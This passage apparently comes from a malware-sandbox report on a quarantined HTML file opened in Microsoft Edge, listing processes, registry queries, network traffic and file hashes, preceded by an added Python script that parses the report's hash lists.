SHA512 d8d379a5c5bfec28dad19c0a59b2afc8cbf6cccd032aecbf8cbc4d5dd3ad1f67f1c447f9b5879ff9e0d596ac549bdcc091080b4dcd59fd4cc28f449019d3aea6
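
Both this file list and the one that closes behavioral14 above share one layout: a path, then MD5/SHA1/SHA256/SHA512, with memory dumps appearing as bare memory/... names and no hashes. The script below is an added example, not part of the report, that parses that layout, groups paths hashed more than once (the CryptnetUrlCache MetaData file above appears nineteen times, one record per version written during the run), decodes the pid and address range encoded in a memory-dump name, and lists hashed executables under the user's Temp directory. The embedded sample is constructed from entries copied out of the two lists.

```python
"""Parse the report's Files section: group rewritten paths, decode memory-dump names,
and pick out executables dropped under Temp.

Added example, not part of the sandbox report. Entries are a path line followed by
MD5/SHA1/SHA256/SHA512 lines; memory dumps are bare 'memory/...' names.
"""
import re
from collections import defaultdict

HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
# memory/<pid>-<sequence>-0x<start>-0x<end>-memory.dmp
MEMDUMP_RE = re.compile(r"^memory/(\d+)-(\d+)-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

# Constructed sample in the report's own layout: two versions of the CryptnetUrlCache
# metadata file from behavioral18, plus a memory dump and the Temp executable from
# the behavioral14 file list.
SAMPLE = r"""
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 6ef4e09c1ddb79e303cf87cb90a92ac3
SHA1 0f7077b485832147a63fa6150ec8e8bda0f65cec
SHA256 76ce657de7a15759e0417ece1c34d011804296a641a6c487623cdcead14c2dde
SHA512 a3c2da65160b7515683c5caab9fdb3424da8f603d9c1c687cbfb59ddd98cb3a8db1161f27cbc9448033896db9f4f5a45fd497459023872cc25640132bb0e079e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 faa9fb81293de466580c675ff1298d06
SHA1 2ebab92d6fb9ff6349349f9defd0a9fe6aa2b72e
SHA256 ff61b2c6e12913b7702efba9711207820838174564089a7bd165c13375de3a6d
SHA512 332038224dffdd75aa48b4803b2a4f14040b439b0722df514aa3a062733511d868ed98c0993339dc34bf53f90c19641568834cbb96d4969b96d11229fe3e83a8

memory/3604-583-0x0000000000400000-0x0000000000429000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10003000101\ab9ee55ffa.exe

MD5 60dd2030e1ff1f9a3406ddc438893694
SHA1 b01f2c39b1046bc892c9db78898e1c063b21836f
SHA256 d77580f219e5b86e38e34d2125862a58d03a76ac1b6dbb40bc4f65b114bbb4ee
SHA512 15f9aad02632481934b3f271debf73d5cf61bdd824d0f4a47e38b391186f7de16ba5f1d51f391625b945ff14b55d90cd31799b1483837aea732a45effef94246
"""


def parse_files(text: str) -> list:
    """Records of {'path': ..., 'MD5': ..., ...}; memory dumps carry only 'path'."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        label, _, value = line.partition(" ")
        if label in HASH_LEN:
            if current is None:
                raise ValueError(f"hash line without a path: {line}")
            if len(value) != HASH_LEN[label] or not re.fullmatch(r"[0-9a-f]+", value):
                raise ValueError(f"malformed {label} for {current['path']}")
            current[label] = value
        else:
            current = {"path": line}
            records.append(current)
    return records


def memdump_region(path: str):
    """pid, sequence and address range encoded in a memory/...-memory.dmp name, else None."""
    m = MEMDUMP_RE.match(path)
    if not m:
        return None
    start, end = int(m[3], 16), int(m[4], 16)
    return {"pid": int(m[1]), "seq": int(m[2]), "start": start, "end": end, "size": end - start}


def rewritten_paths(records: list) -> dict:
    """Paths hashed more than once, mapped to the SHA256 of each version in order."""
    versions = defaultdict(list)
    for r in records:
        if "SHA256" in r:
            versions[r["path"]].append(r["SHA256"])
    return {p: h for p, h in versions.items() if len(h) > 1}


def dropped_executables(records: list) -> list:
    """Hashed .exe files under the user's Temp directory (a heuristic, not a verdict)."""
    return [
        r["path"] for r in records
        if "SHA256" in r
        and r["path"].lower().endswith(".exe")
        and "\\appdata\\local\\temp\\" in r["path"].lower()
    ]


if __name__ == "__main__":
    recs = parse_files(SAMPLE)
    print(len(recs), "entries; rewritten:", list(rewritten_paths(recs)))
    print("dropped executables:", dropped_executables(recs))
    print("memory regions:", [memdump_region(r["path"]) for r in recs if r["path"].startswith("memory/")])
```

The grouping is what makes a long Files section readable: nineteen records for one CryptnetUrlCache path collapse to one line with nineteen versions, while the single hashed PE under Temp stands out on its own, and the memory-dump names tell you which PID and which address range (here 0x400000 to 0x429000, a 0x29000-byte image-sized region in PID 3604) the sandbox captured.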

Analysis: behavioral19

Detonation Overview

Submitted 2025-02-26 23:27
Reported 2025-02-26 23:30
Platform win10v2004-20250217-en
Max time kernel 145s
Max time network 128s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4380 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1656 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 4352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 4352 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4380 wrote to memory of 1652 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\kablenet.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe4e9546f8,0x7ffe4e954708,0x7ffe4e954718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5092 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5196 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,15876232047822424636,13281325721610766394,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4792 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 93be3a1bf9c257eaf83babf49b0b5e01
SHA1 d55c01e95c2e6a87a5ece8cc1d466cc98a520e2a
SHA256 8786fd66f4602e6ed3fa5248bd597b3f362ffa458f85207eaa154beb55522348
SHA512 885b09dd3072921f375eedb5f0575561adc89700ecfbe999bc3e5ea1d7cb45e19d85c5e420f2c0a12b428742e1110e66f4ceecbe5a6badddd36cc9e0aff48e52

\??\pipe\LOCAL\crashpad_4380_FCFZQUCWKNGHFXBO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 6738f4e2490ee5070d850bf03bf3efa5
SHA1 fbc49d2dd145369e8861532e6ebf0bd56a0fe67c
SHA256 ca80bbae3c392e46d730a53d0ee4cfecbbe45c264ad3b3c7ee287252c21eaeab
SHA512 2939edf5e6c34c9ea669a129a4a5a410fbbd29cd504dc8e007e9b3b3c7fbb9bea8c14d6177ac375d0c481995774a02d210328569231cb01db07b59452333b22b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4e2d71d6ff210326092dc385fb5b747f
SHA1 68bcca89c257a30cd7096c3be83b9b02fccd82b1
SHA256 2b9b0462052913ba0a94fe89845d4d192b815964a9a9e0e048b97e6e90636411
SHA512 c4c5c35db03890e457159d42e810a55a800d86092fe141e98173301056632079f7f4410557dbde8974279e49ee858bdf2ab583287f938a6d70d89c60f4d9ef6f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
